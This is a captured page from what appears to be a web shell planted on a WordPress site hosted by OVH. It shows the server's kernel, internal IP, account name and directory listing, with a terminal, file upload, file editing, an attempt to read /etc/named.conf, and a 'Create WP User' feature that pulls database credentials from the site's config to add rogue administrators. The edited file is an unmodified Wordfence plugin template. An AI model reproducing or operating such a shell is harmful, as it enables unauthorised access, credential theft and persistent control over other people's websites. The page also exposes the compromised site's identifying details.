Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
wordfence
/
modules
/
login-security
/
views
/
onboarding
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
standalone-header.php
1.71 KB
-rw-r--r--
2026-02-24 12:20
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
standalone-header.php
<?php if (!defined('WORDFENCE_LS_VERSION')) { exit; } /** * Presents the fresh install plugin header for standalone installations. */ ?> <div id="wfls-onboarding-standalone-modal"> <div id="wfls-onboarding-standalone-modal-header"> <div id="wfls-onboarding-standalone-modal-header-title"><?php esc_html_e('Wordfence Login Security Installed', 'wordfence'); ?></div> <div id="wfls-onboarding-standalone-modal-header-accessory"><a href="#" id="wfls-onboarding-standalone-modal-dismiss">×</a></div> </div> <div id="wfls-onboarding-standalone-modal-content"> <p><?php esc_html_e('You have just installed the Wordfence Login Security plugin. It contains a subset of the functionality found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA.', 'wordfence'); ?></p> <p><?php printf(__('If you\'re looking for a more comprehensive solution, the <a href="%s" target="_blank" rel="noopener noreferrer">full Wordfence plugin</a> includes all of the features in this plugin as well as a full-featured WordPress firewall, a security scanner, live traffic, and more. The standard installation includes a robust set of free features that can be upgraded via a Premium license key.', 'wordfence'), 'https://wordpress.org/plugins/wordfence/'); ?></p> </div> </div> <script type="application/javascript"> (function($) { $(function() { $('#wfls-onboarding-standalone-modal-dismiss').on('click', function(e) { e.preventDefault(); e.stopPropagation(); $('#wfls-onboarding-standalone-modal').slideUp(400, function() { $('#wfls-onboarding-standalone-modal').remove(); }); WFLS.setOptions({'dismissed-fresh-install-modal': true}); }); }); })(jQuery); </script>
关闭
保存